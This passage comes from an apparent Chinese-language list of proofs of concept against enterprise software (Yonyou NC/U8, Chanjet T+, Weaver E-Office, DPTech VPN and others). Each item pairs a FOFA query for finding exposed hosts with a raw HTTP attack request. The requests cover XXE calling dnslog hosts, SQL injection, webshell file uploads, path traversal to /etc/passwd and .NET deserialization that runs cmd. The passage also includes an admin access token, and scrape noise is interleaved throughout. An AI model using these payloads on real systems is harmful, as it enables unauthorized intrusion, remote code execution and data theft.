* P* l) b S) v- d4 N5 Q/ T- \- R- uAccept-Encoding: gzip, deflate$ g9 g6 Y' C2 p$ S/ o
Accept: */*7 r0 {; H, k# C3 P
Connection: close) g" a" K% E8 x$ _( y+ l
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
( Y8 c) r4 @# [5 n& NContent-Length: 190' m' g9 s" S& P- @* X) w0 ^0 m* c
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
$ \( `! M8 h, \5 t
: _# {2 H1 n6 ]' N6 }--fd28cb44e829ed1c197ec3bc71748df0; ]4 r1 j8 X |
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
/ G8 d. q- e, ^$ L
# B: C8 H3 n6 P# @+ w1 X<%out.println(1111*1111);%>
( E! G4 g3 @/ {. ]5 ?2 {--fd28cb44e829ed1c197ec3bc71748df0--) O6 K8 q: B" y" l/ c- F
1 n% K( |% J* Z
& B! x. I4 c0 ^( x* y36. 用友NC-Cloud soapFormat XXE
+ z5 c# x! |1 R# f- z# W+ D' dFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"! s% R3 k, g. W* U) w
POST /uapws/soapFormat.ajax HTTP/1.1
0 f) B" f E; _$ M3 c/ a9 b4 C. xHost: 192.168.40.130:89891 V5 e' ~6 V; @8 X, \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
, s8 ^, c5 _' `0 q( b/ lContent-Length: 263
1 K2 c1 \8 l! w3 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' m& i- Z" z6 ^7 n C
Accept-Encoding: gzip, deflate$ h3 M" _, S; Q& \. f' p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! `! ^& b0 h) p
Connection: close
: ]/ y" a% J6 v+ p4 b' @( IContent-Type: application/x-www-form-urlencoded
; e# ?8 n M5 f5 }3 LUpgrade-Insecure-Requests: 1
3 s+ ]9 H* b7 j: b6 v/ ^0 ~, k: x3 c- W, C0 M0 ^, e
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
( E- q2 }+ x* L% ^, L; g$ G2 [
# ~5 d( a* F0 u2 d
6 C8 u6 s# H. Q1 w4 [; t) ?37. 用友NC-Cloud IUpdateService XXE( p" X: W; x3 _6 h$ t' `) X2 T
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
`6 v2 w" G- ] ^; qPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1: u$ R. ~, N4 C; t' u& F: @) C3 N
Host: 192.168.40.130:8989" }+ {2 c4 j5 B+ O, l: W% _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
' U9 N) A* ^+ S! hContent-Length: 421# J9 b8 p: K2 @1 N6 D% J, I0 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, }0 g Z/ `, ]4 x W) E) ^$ xAccept-Encoding: gzip, deflate0 J2 a6 z [7 O- K
Accept-Language: zh-CN,zh;q=0.9
. ~/ G1 u2 ?. J" ~4 k3 n/ oConnection: close. z; ~; o' Y2 q) M( x- r, I
Content-Type: text/xml;charset=UTF-8
! Z: h+ ~0 M" }8 v9 vSOAPAction: urn:getResult
8 O' E* c0 }. ^! V9 }, nUpgrade-Insecure-Requests: 1* H4 B4 _; z: n. y) A/ N# ?
- m7 B% [9 z7 a$ D& ^$ n
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">' G [; L/ [ A2 l
<soapenv:Header/>
4 F! c; a3 a l `$ x- r/ C5 ~- Z<soapenv:Body>( ~6 C# p! y$ W2 j
<iup:getResult># i* C0 X$ f1 A5 Y% Y) @+ z
<!--type: string-->
+ @$ F; n# \0 R4 I) H<iup:string><![CDATA[0 {6 [5 `' z2 w r$ y, V
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
4 B+ f% q' x- o: {) V<xxx/>]]></iup:string>& b7 d6 ^: v P
</iup:getResult>
2 |) G* y* p! S, ~- y" Y</soapenv:Body>8 F4 O9 V7 {& @* G8 r
</soapenv:Envelope>* N* ^8 C% J6 d% a: E8 l1 _
7 `4 B5 q* I( ^9 R( f7 w
( ^- i3 p8 l$ ~6 q7 g8 i
! t3 s3 O' Y9 T& Q1 [8 T4 p4 i; C
38. 用友U8 Cloud smartweb2.RPC.d XXE" \$ `: s" K; U7 T+ M ]
FOFA:app="用友-U8-Cloud". T( }3 W$ C' c8 Z( d6 U
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1, y/ ^$ \- W; L E
Host: 192.168.40.131:80889 u# J) m& M6 e, j8 r# ^+ I5 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25& n* }# w! V6 F
Content-Length: 260
- F! J. ]- @, h6 c" SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3( b+ d, |$ M4 V+ Z1 w4 ?- M
Accept-Encoding: gzip, deflate7 M* H; N$ d' N B, R1 h
Accept-Language: zh-CN,zh;q=0.9
3 I2 `- r+ u; l+ H0 XConnection: close
5 {9 L& m) Z& A% y* [/ ?5 YContent-Type: application/x-www-form-urlencoded
8 _6 v- o. p) w! M+ d) @% T7 {8 | H! W& @
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
4 J! b1 s+ _1 L$ r& V) H
' D, p5 N# q% |- V' b7 [* b$ c4 |
39. 用友U8 Cloud RegisterServlet SQL注入* G+ M6 N. d' M
FOFA:title="u8c" S2 M9 ~6 ^7 h0 Z$ D# ]
POST /servlet/RegisterServlet HTTP/1.1
0 @+ ^# ^( z; s QHost: 192.168.86.128:8089) C* [& v7 G' u. _2 o, L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
/ {, ]+ D) L" d! a' VConnection: close2 E! o- w) {: p5 I
Content-Length: 85
" z+ b3 u$ N) jAccept: */*9 l$ G7 a; U6 v$ y1 i* A/ h
Accept-Language: en
- \) |; A: F& BContent-Type: application/x-www-form-urlencoded- U3 E+ Y9 ]( ~% U9 n
X-Forwarded-For: 127.0.0.17 F$ z! s- a: j+ l( v
Accept-Encoding: gzip) e2 C- F8 J3 L* f. B/ |: h
6 o) i' `- m: S7 {/ o. v, n4 E( H' Z
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
- W/ l2 t7 j, _# E! [7 Z& n/ D
1 t, ~% | X3 S7 u0 T0 g
( i y6 Q. N% a; K5 C% E40. 用友U8-Cloud XChangeServlet XXE! A) C' E# k# c5 ]' G5 t" S, u( K
FOFA:app="用友-U8-Cloud"
$ Z, G q, K# v# @% nPOST /service/XChangeServlet HTTP/1.1; q0 G: s/ r3 L5 Q9 l$ h: J% _
Host: x.x.x.x
2 W% K4 `& X z& [% C+ Y) wUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 ^# U: e! a i( A5 r. E8 o+ q. TContent-Type: text/xml* l9 {: s( b: G; @% g. \: v! X
Connection: close' h% B9 @" w6 n% c W
5 J) N, o, B; y* J5 {<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>- W4 B; P3 f- W8 x( ]7 M
5 j7 f O. x0 X( I
9 u8 n' m; G" K8 K41. 用友U8 Cloud MeasureQueryByToolAction SQL注入! v3 s4 R6 B0 r; g) ]/ i* A
FOFA:app="用友-U8-Cloud"
" W0 {1 a& n/ l- }4 qGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
% _! F( S4 P3 c( KHost:; ^ w$ N; S v9 _9 V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ u" n5 c# ^0 x5 t
Content-Type: application/json- {8 i' u+ G% H% F
Accept-Encoding: gzip1 z2 K w( x- z7 j R6 ~# r' `
Connection: close
" k/ {1 w. t- A+ Z7 e; U$ R$ U% ~- r0 p& l' z1 X) s: C
* p2 ^7 E: D! i0 ~
42. 用友GRP-U8 SmartUpload01 文件上传
" \: s: k5 m) N$ X6 k1 w8 Z# SFOFA:app="用友-GRP-U8"
9 v( h$ C# m1 e* u+ P+ Y1 p/ D0 dPOST /u8qx/SmartUpload01.jsp HTTP/1.14 w2 C+ U0 d# c( h6 A
Host: x.x.x.x) ]0 A! J! b& A8 a0 O, B" w, t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
, Z, i2 a, T$ mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36# C0 ]3 E/ T- m3 s- _+ S8 M" @
$ }( P: y1 Y' l% r; F# [# I
PAYLOAD& k3 B! f+ d- v
2 i7 w) @3 e5 S: O
+ }! L4 x% w. P
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml. ]4 L! }" k' R" E
1 ^' ^3 C+ p5 n8 B, T9 G @43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 ?8 C- @7 Y& ?' R- K
FOFA:app="用友-GRP-U8"
j7 @* @9 I8 @3 k7 G8 x PPOST /services/userInfoWeb HTTP/1.1% d! d: N+ @% u% s
Host: your-ip
2 n% w0 |2 h' d8 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
4 x2 r+ `$ w/ U; |: J: p: rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 _" B3 Z; P& K$ F8 w1 @" J* v
Accept-Encoding: gzip, deflate9 i8 x. e8 v' p! F: I4 ~2 x4 x
Accept-Language: zh-CN,zh;q=0.95 k [- `' m& q4 A8 p
Connection: close y/ N" B* h7 n ^1 k0 F
SOAPAction:2 J2 e8 e: o7 O2 l6 L# G/ Q
Content-Type: text/xml;charset=UTF-88 `, ^4 f7 p( D1 f8 J! h. A
6 Y$ X0 F) H$ k3 |% q- i" d/ C
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
: V' [* ^. f4 D2 W <soapenv:Header/>" _# ]2 Y# o) u3 w. v# z
<soapenv:Body>
/ }1 f, I: P# y( A <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
* v4 ?5 T9 C3 S <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>% C* t) C3 O6 n/ x) l
</ser:getUserNameById>; G0 X! M* O5 K1 h! q3 Z
</soapenv:Body>2 w7 K4 ~( `% u7 l3 A- z
</soapenv:Envelope>& ^& S2 x* w, X! @
9 e+ m {+ C. s+ h r
% Q* b5 b2 [3 W# j H5 I44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: A" Y1 a4 I7 m HFOFA:app="用友-GRP-U8"8 G& W4 ~) X) q0 Y# @9 v- g
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
& {( E( m8 W; A( sHost: your-ip) Q/ X# @) r3 I ^' t& y' G6 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.363 T( _: g% e, _' s* R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 p. Y1 I: C2 P V7 @Accept-Encoding: gzip, deflate! O4 c; ~7 M3 G0 }
Accept-Language: zh-CN,zh;q=0.93 D' _. @! X# j, ~3 F
Connection: close$ ?; u. e" G+ W4 u% d. U7 [
4 g% {4 q; `5 j$ f5 S
, Y$ `! } ~9 L0 S45. 用友GRP-U8 ufgovbank XXE
7 U) h; A# _- `( G E7 y1 U9 aFOFA:app="用友-GRP-U8"
( L: ~0 G2 x$ v( [! ?/ EPOST /ufgovbank HTTP/1.1# ? C9 }. _+ ]( C+ |
Host: 192.168.40.130:222+ N0 l, A0 W& K3 D) ^& K6 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
( v. K8 m7 ~0 |Connection: close
' l. h# s. L5 X+ {' Q, P- `Content-Length: 161- E2 K3 K( b& e* s: U8 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. n# @3 m Q- w2 w v$ A9 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. N+ h ?# |5 r1 b5 C- Y3 L
Content-Type: application/x-www-form-urlencoded
2 g4 E, K# _2 cAccept-Encoding: gzip
) K$ K" `8 ~1 K, {
2 ~% I9 B$ D# I7 W5 [% ^reqData=<?xml version="1.0"?>7 s8 E+ A" `- {) E* P3 \" F
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest7 e, \, P! M e4 m. _
& U, t! U U0 r9 I3 U* x5 T3 u6 J9 {! Y; Y2 {0 {! S
46. 用友GRP-U8 sqcxIndex.jsp SQL注入9 s1 k( x& A" a: H# {# t' p
FOFA:app="用友-GRP-U8"3 Q9 m( w W& V! w
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
6 k; E% f0 c9 @2 \& NHost: your-ip. r: [6 U7 g7 M! q3 T' N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
4 U0 A, ~5 h% T! a: N% PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- h! ]: T# Q( `Accept-Encoding: gzip, deflate
! C. |7 a& z# A- |/ j. tAccept-Language: zh-CN,zh;q=0.9! g D) A: o& ]+ h8 c R [, w% @: R" }
Connection: close
) Y+ i& _" x% Y1 m; V' H1 o, U" y* k: N( p
7 X8 B# F' V! X8 i* f3 j) {- U8 z
47. 用友GRP A++Cloud 政府财务云 任意文件读取, S/ h% M$ x1 M' _3 g
FOFA:body="/pf/portal/login/css/fonts/style.css", t, i9 k0 N, J+ e. t, d3 j ?
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
% i0 T1 j! s/ x. ]6 tHost: x.x.x.x
( v1 E) I/ d0 F; q0 oCache-Control: max-age=0, s( g2 N; T4 U3 C6 @
Upgrade-Insecure-Requests: 1
! K' ?0 J" N k; e6 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 i3 V: W: J# x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 X1 U- u: A+ I5 {8 J9 [
Accept-Encoding: gzip, deflate, br
: H5 ?' \1 N) s5 c7 kAccept-Language: zh-CN,zh;q=0.9 T5 D' u+ u* c
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
3 @; T* V# d! NConnection: close
! M' g+ l. w1 T# w D' Q9 s3 C! `' S6 t- ]
+ L. B2 r0 i5 S. E5 D8 d6 Q) D/ t0 n3 F# i
48. 用友U8 CRM swfupload 任意文件上传
# |: M* f# J5 N( p3 RFOFA:title="用友U8CRM"
/ {$ U# L, z1 ]: E" s5 LPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
; D; }' b2 r& e& b# }& J3 W- hHost: your-ip
5 Y* O( Y o( B# Q% x. DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: e" h8 F7 Q3 f6 n* S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" ^1 v) G2 s q( i. i) DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 l5 P$ j+ e/ V/ Q) |* ZAccept-Encoding: gzip, deflate
I# S" _4 T5 A( {0 D, FContent-Type: multipart/form-data;boundary=----2695209672394068716424300668555 ?2 c$ H# X4 B$ X, C
------269520967239406871642430066855
) P! H5 D6 x% a8 Y% v- u! s. lContent-Disposition: form-data; name="file"; filename="s.php"1 W4 t2 T0 |6 Q! r* A
1231
9 X% [7 Y" Q# r0 [; G3 O5 TContent-Type: application/octet-stream
% [/ A' [' G( _------269520967239406871642430066855% u$ O( R7 c) h' A# Y0 b! @
Content-Disposition: form-data; name="upload"
& P6 K9 c/ x, f4 e X- O' p; [upload0 f. Z! A8 s4 E2 {4 W f7 g; R1 y
------269520967239406871642430066855--1 @+ I5 s( m% {* Y% s9 M
1 Q4 J7 t8 b( U) Y
+ i% ]4 W+ P( T, x, | h7 o- M49. 用友U8 CRM系统uploadfile.php接口任意文件上传7 q" P& A" l: ?" C) |4 P
FOFA:body="用友U8CRM"
`0 }" u8 a1 V8 i% Z2 J6 J. r# m! V: j. J& ~( h3 q
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
* G( ^- o6 M# p. y" w7 w2 aHost: x.x.x.x8 ]0 G# p n! U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 i0 t+ o+ S6 g1 n% n0 K' s! V, B
Content-Length: 329* Y% ] \8 k0 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, n+ i6 d" ?6 l b* ~# \Accept-Encoding: gzip, deflate
4 V+ w& D5 K3 C1 U2 xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' I$ R) U7 o5 T6 xConnection: close4 P: }- V1 m. t6 f/ {2 a
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
' |7 q+ M$ N1 T/ c& _' |( @+ D3 w" d2 W0 [4 c
-----------------------------vvv3wdayqv3yppdxvn3w
! M- V: U) f" [. o) ?! `4 wContent-Disposition: form-data; name="file"; filename="%s.php "
6 {, K) [3 y9 s- v; g, MContent-Type: application/octet-stream
* {9 K" b! F# F9 M9 N; |! p8 ?$ h( o$ l
wersqqmlumloqa
) h( C& G* u* W _- e8 B-----------------------------vvv3wdayqv3yppdxvn3w
/ {+ a+ E. e( o& E7 }' AContent-Disposition: form-data; name="upload"
, b; z! Y8 ~, B& X2 |/ ]: R' J) b c7 P" T* I% h
upload
; z( R- {! ~9 I8 j5 x8 z$ l, L: d-----------------------------vvv3wdayqv3yppdxvn3w--
D8 K g) K9 l3 n2 [' v" e& H/ Z& A& D, o7 T$ Y- o& m& Y
+ ?/ k$ _1 h9 Jhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
- L( h" {: y6 Z7 a8 o: G o( `" c# H2 P4 _6 R
50. QDocs Smart School 6.4.1 filterRecords SQL注入
% h, @6 ^! z: ]1 mFOFA:body="close closebtnmodal"3 e7 }" }: S6 d7 v& z7 G
POST /course/filterRecords/ HTTP/1.1: s# }. d* W- j1 i
Host: x.x.x.x; O/ w5 i* H5 i, g2 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% U$ ]5 L& |+ l+ s3 n% A% G
Connection: close
) p2 Y( z- l6 y. W l8 _ C* `Content-Length: 224
; N( X- Q6 R; B O" m: w# p! \Accept: */*1 n3 _) N7 D; ?( M3 z( |
Accept-Language: en7 d6 ?# y- O1 z
Content-Type: application/x-www-form-urlencoded3 p0 ^' h- Y. Q3 h5 v, Z
Accept-Encoding: gzip
3 |2 p9 X5 q' G0 ]! x" {! R; U$ e# Y' V( v! a+ s% z
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
P/ V! C7 `6 @) ~ N# A h9 b0 F8 ~- v w$ i
8 h2 O( |& O1 p2 Z" L2 [$ M) M
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
1 l2 M, l0 ]$ {+ V1 r1 QFOFA:app="云时空社会化商业ERP系统"
2 K. U/ H: n1 `$ u& I5 n0 D* n% UGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.13 ^6 n$ j* s }; w& v
Host: your-ip
- v! ^ @9 U. {User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.368 T6 _5 x' i5 E' n7 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
9 @# J. w Z9 j* u+ t: ]6 V3 wAccept-Encoding: gzip, deflate
' W; ~* Y3 s- e( J& u pAccept-Language: zh-CN,zh;q=0.9
7 P, F7 l3 Q2 g* S: wConnection: close
' q! V+ s& L2 U& E/ S% o2 d( h7 m' _3 Z, I: r4 n! n- _4 g
% Y1 X; j J, J: c) R
52. 泛微E-Office json_common.php sql注入
: n) j. v$ K+ o1 g: G2 h! E' \! hFOFA:app="泛微-EOffice"3 a) t: u( \& @2 \: R2 N* X9 A- M: [ K
POST /building/json_common.php HTTP/1.1
: l @+ a8 \( K5 U4 G: VHost: 192.168.86.128:8097
3 c- a. K1 b8 E; VUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& |) J _) { c. {
Connection: close$ c% \0 y2 A5 r E- `" |2 f
Content-Length: 879 a5 ^. S2 ^$ B+ m
Accept: */*
; u# t& k# e2 q cAccept-Language: en& b+ P. G/ w9 d" A
Content-Type: application/x-www-form-urlencoded
2 W7 b8 q( {, [ {Accept-Encoding: gzip
# X c4 c* d. p0 p# a
* R3 P \: D8 v. [; Ktfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333 x6 Q; C2 p" D0 r
* n: x' W6 V. d4 m# ^3 E
& d s$ K! P' u$ h9 U9 ?53. 迪普 DPTech VPN Service 任意文件上传) R6 _5 `; f4 {, b- j# A
FOFA:app="DPtech-SSLVPN"- V2 h* B0 D' g& j8 h
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd% }: I0 Q2 J1 x
' i; r) e9 W0 [0 c5 J9 @
; x) d. ]; x! m. ^, N3 H5 R' j
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
- v9 K8 P) \0 Z' e. X: g* kFOFA:app="畅捷通-TPlus"
8 @4 q3 G* I* O2 F第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
3 j1 @2 I1 a( I# i* Z3 T% J/ Y"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
; v0 ~# H6 E* u; R
6 S! S; R1 c* w" F x4 r" X% l' {5 N: h# G
完整数据包$ K/ s Z- @& c: K! [! d7 [) K
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
V1 R4 ?; V. \Host: x.x.x.x. i( H; Q" s8 {/ i4 U( I& K
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F1 o; H1 o0 u7 t2 {3 ^; E
Content-Length: 593
" K! W" M1 H. M$ F8 R% F4 I& \/ q. m
. W" z" R |: Y" r{8 n3 `& j8 _* ~8 `) [9 R5 ^
"storeID":{
6 y6 ?1 V! |/ Y( _ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
: R( H# g8 j; U+ n "MethodName":"Start",
& m9 o7 B, @' ~( L* R2 M "ObjectInstance":{
' m' S, J' v+ O* t, _: \ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* R6 H9 d7 ~' M% \0 ^4 W$ i) d; j "StartInfo":{
+ K+ ?7 e% }3 f# k "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- Q8 @3 r4 z1 X* U4 B; A( \, ^ "FileName":"cmd",+ V, I+ J; ^ L3 C, W9 V
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
: g5 @9 y' H" n) T }" N% |! l- L: N9 X( G
}( l) k- P4 ]3 P( I
}
}9 ~4 U4 A: E2 l8 N0 x9 K} p1 Q( m- _6 T& G1 ?! G3 Y
9 @) y `& K! u0 f- I6 h8 z. z6 z
) _$ F# y: j J2 d0 V4 Y第二步,访问如下url
8 r( r3 K' b$ ?' ?# y/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
9 }9 s6 L9 X2 t6 z
; U( U" b$ T8 z) S. S0 {5 x: {$ A/ o2 O
55. 畅捷通T+ getdecallusers信息泄露
% Z1 c2 m: B& A5 uFOFA:app="畅捷通-TPlus"; ~1 F/ v1 l9 b% \: x: \8 G
第一步,通过; [! \. K& q$ L, T
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie; |' _% }* U# ^6 W
第二步,利用获取到的Cookie请求
' V6 B2 j8 U6 Q1 b$ T/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers) R7 z2 S' ^. i& ^
5 o! P/ O4 p3 j
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 w3 d, X, h4 R# j* E4 NFOFA: app="畅捷通-TPlus"' c: A9 R: @, ^
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1, V& D% q- X/ d
Host: x.x.x.x
2 C' `. U: r% \# ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
5 d& ~+ Z* s: Y( F0 M2 sContent-Type: application/json
5 I. I! O# i% E3 i+ b$ M
# i6 J1 ~+ i& [+ v{
2 ?8 q: L; }4 a1 E6 F( x "storeID":{
# [ U% |; g, X- r "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"," ^6 q/ U; `/ h( C; @9 e7 b
"MethodName":"Start",1 I9 l/ @: v9 y9 r9 r
"ObjectInstance":{
